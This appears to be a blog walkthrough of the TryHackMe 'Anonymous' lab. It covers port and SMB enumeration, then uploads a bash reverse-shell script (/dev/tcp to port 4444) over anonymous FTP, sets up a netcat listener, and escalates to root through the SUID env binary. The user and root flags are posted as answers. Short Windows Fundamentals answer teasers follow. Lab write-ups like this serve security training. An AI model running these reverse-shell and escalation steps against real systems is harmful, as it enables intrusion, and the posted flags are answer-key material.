Skip to main content

Anonymous

 Tryhackme - Anonymous



NMAP - Network mapper

#1 - Enumerate the machine. How many ports are open?

# nmap -sC -vv -A 10.10.138.102

Nmap scan:

ANSWER - 4

#2 - What service is running on port 21?

ANSWER - ftp

#3 - What service is running on ports 139 and 445?

ANSWER - smb

#4 - There’s a share on the user’s computer. What’s it called?

#smbclient -L 10.10.138.102

 

ANSWER - pics

#5 - user.txt

 


clean.sh


#!/bin/bash
bash -i >& /dev/tcp/10.8.192.14/4444 0>&1

Connect to the FTP server again:

ftp 10.10.37.186
Anonymous
cd scripts
put clean.sh
 
Now set up a netcat listener on the specified port:

#nc - nvlp 4444                                                       
listening on [any] 4444 ...
connect to [10.8.192.14] from (UNKNOWN) [10.10.138.102] 54700
bash: cannot set terminal process group (1399): Inappropriate ioctl for device
bash: no job control in this shell
namelessone@anonymous:~$ ls
ls
pics
user.txt
namelessone@anonymous:~$ cat user.txt
cat user.txt

90d6f992585815ff991e68748c414740

user flag - 90d6f992585815ff991e68748c414740

I tried to check my privileges with sudo -l but as I don’t have the user’s password, it failed. Let’s check what programs are owned by root with the SUID bit set:

Privilege Escalation

sudo -l doesn’t work so let’s check the SUID binaries. If you are unsure about finding and exploiting SUID binaries

To get a list of all SUID binaries, execute the following command:

#find / -user root -perm -u=s 2>/dev/null

/usr/bin/passwd
/usr/bin/env   <--- here
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/pkexec
 

GTFOBins (https://gtfobins.github.io/gtfobins/env/) reveals a potential privilege escalation:

namelessone@anonymous:~$ env /bin/sh -p
# whoami
root
# cd /root
# ls
root.txt
# cat root.txt  
4d930091c31a622a7ed10f27999af363

root flag - 4d930091c31a622a7ed10f27999af363



 

Comments

Post a Comment

Popular posts from this blog

Windows Fundamentals 2

 TryHackMe - Windows Fundamentals 2 Task 1 Introduction  #1 :- Read above and start the virtual machine.  Answer :- No Answer Needed Task 2 System Configuration   #2.1 :- What is the name of the service that lists Systems Internals as the manufacturer?  Answer :- PsShutdown #2.2 :- Whom is the Windows license registered to? Answer :- Windows User #2.3 :- What is the command for Windows Troubleshooting? Answer :- C:\Windows\System32\control.exe /name Microsoft.Troubleshooting #2.4 :- What command will open the Control Panel? (The answer is  the name of .exe, not the full path) Answer :- control.exe Task 3 Change UAC Settings  #3 :- What is the command to open User Account Control Settings? (The answer is the name of the .exe file, not the full path)  Answer :- UserAccountControlSettings.exe Task 4 Computer Management  #4.1 :- What is the command to open Computer Management? (The a...
Post a Comment
Read more

Windows Fundamentals 3

 Tryhackme - Windows Fundamentals 3   Task-1 Introduction  #1:- Read the above and start the virtual machine.  Answer:- No Answer Needed Task-2 Windows Updates  #2:- There were two definition updates installed in the attached VM. On what date were these updates installed?  Answer:- 5/3/2021 Task-3 Windows Security  #3:- In the above image, which area needs immediate attention?  Answer:- virus & threat protection Task-4 Virus & threat protection  #4:- Specifically, what is turned off that Windows is notifying you to turn on?  Answer:- Real-time protection Task-5 Firewall & network protection  #5:- If you were connected to airport Wi-Fi, what most likely will be the active firewall profile?  Answer:- public network Task-6 App & browser control  #6:- Read the above.  Answer:- No Answer Needed Task-7 Device security  #7:- What is the TPM?  Answer:- Trusted Platform Module Task-8 BitLocker #8:-...
Post a Comment
Read more

Windows Fundamentals 1

TryhackMe - Windows Fundamentals 1 Task 1 - Introduction to Windows  #1 :- Read above and start the virtual machine.  Answer :- No Answer Needed  Task 2 Windows Editions  #2 :- What encryption can you enable on Pro that you can't enable in Home?  Answer :- BitLocker Task 3 The Desktop (GUI)  #3 :- Which selection will hide/disable the Search box? Answer :- Hidden #3.2 :- Which selection will hide/disable the Task View button? Answer :- Show Task View button #3.3 :- Besides Clock, Volume, and Network, what other icon is visible in the Notification Area? Answer :- Action Center Task 4 The File System  #4 :- What is the meaning of NTFS?  Answer :- New Technology File System Task 5 The Windows\System32 Folders  #5 :- What is the system variable for the Windows folder?  Answer :- %windir% Task 6 User Accounts, Profiles, and Permissions  #6.1 :- What is the name of the other use...
Post a Comment
Read more